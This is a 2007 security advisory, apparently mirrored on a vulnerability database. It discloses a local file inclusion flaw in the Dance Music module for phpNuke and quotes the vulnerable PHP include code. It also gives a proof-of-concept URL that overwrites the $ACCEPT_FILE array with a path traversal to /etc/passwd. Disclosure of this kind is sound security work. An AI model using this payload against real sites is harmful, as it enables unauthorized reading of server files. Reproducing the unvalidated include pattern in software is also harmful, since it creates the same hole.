Vulners
Lucene search
waraxe-2007-SA054.txt
🗓️ 26 Sep 2007 00:00:00Reported by Janek Vind aka waraxeType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
`
[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke
============================================================================
Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke
Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com
Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's take a peek at source code of "index.php":
------------>[source code]<------------
include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
------------>[/source code]<-----------
As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.
Proof-of-concept test:
http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd
Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154
So local file inclusion exists, but safe mode can make exploiting harder.
//-----> See ya soon and have a nice day ;) <-----//
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free Service manuals - http://service-manuals.waraxe.us/
User Manuals - http://user-manuals.waraxe.us/
---------------------------------- [ EOF ] ----------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4